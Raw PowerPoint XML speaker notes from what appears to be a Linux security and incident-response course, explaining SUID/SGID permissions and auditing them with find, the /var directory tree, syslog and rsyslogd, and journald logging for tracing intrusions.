            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21382318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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for the class. How does a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>nonroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> user change his own password when he does not have write permission to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/shadow file? It is done using special permissions in Linux. When an executable file is run, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> has three special permissions of: SUID flag/bit that can be set, an SGID flag/bit that can be set and sticky bits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To view a list of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> files on the system, run the following command: find / -perm -4000 -ls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Search for SUID binaries that contain parameters for code execution (‘-e’, ‘-exec’ or other parameters that write arbitrary data to file system).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For each file found, you will need to check if the file is legitimate and if its permissions are set correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, as discussed a few slides back, can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> command with 4 digits to set the permissions. The order of digits matter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>user/owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-2016-152744.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39679623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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19092560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44825" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556816" y="944563"/>
            <a:ext cx="5888736" cy="7614150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a standard </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>subdirectory of the root </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directory in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>contains files to which </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>the system writes data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>during the course of its </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>operation. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/ consists </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>of a few subdirectories </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/cache/, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lib, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lock, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/log, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/temp), but the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>will focus on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/log. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is specific for each computer, that is, it is not shared over a network with other computers, in contrast to many other </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>high-level directories. Its contents are not included in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> because situations can occur in which it is desired to mount /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>read-only, such as when it is on a CD-ROM or another computer. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> should also only contain static data from application programs. When conducting incident response, the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/log is a good place to look, but know that logs may be generated and stored elsewhere as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In case you need to cover.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/cache has application cached data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lib has data modified as programs run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lock </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>lock files, to track resources in use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/opt variable data for installed packages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool tasks waiting to be processed… /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>cups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>print queues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>temporary files saved between reboots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Source: https://www.linfo.org/var.html.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6879481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a:xfrm>
            <a:off x="556816" y="2954311"/>
            <a:ext cx="5888736" cy="6011269"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syslog is a logging protocol used to generate logs. The respective Linux distributions treat logging differently, but the syslog functions are inherently the same across the distributions. See RFC 5424 for further specifics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syslog functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originator: Generates syslog content; Collector: Gathers syslog content for further analysis; Relay: Accepts and forwards messages (from originator, to/from relays, to collectors); Transport sender: Passes syslog message to transport protocol; Transport receiver: Takes syslog message from transport protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To find how/where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>syslog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functions are taking place, we can parse through the respective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but where do we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>start? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As mentioned, logs can vary greatly depending on the Linux distribution and configurations. Due to the variety, conducting a check for syslog in the running processes is a good place to start. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first command searched for syslog in the running processes using ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> syslog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:spcBef>
                <a:spcPts val="289"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="289"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shows we are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rsyslogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. From here we could search for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsyslog.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to find out how the system was configured for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>logging, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which could provide additional/vital information in finding/fixing an adversary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://pentesterlab.com/exercises/linux_host_review/ course.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38432939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Journald</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a system service that collects and stores logging data. It creates and maintains structured, indexed journals performing the syslog functions from a variety of sources </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>i.e., syslog messages can come from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> syslog(3) call or Kernel log messages from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kmsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Of additional note is the logs that may be duplicated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> logs. If an intruder failed to clean up their tracks, this is to highlight that actions can create multiple logs that can piece together a compromise. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
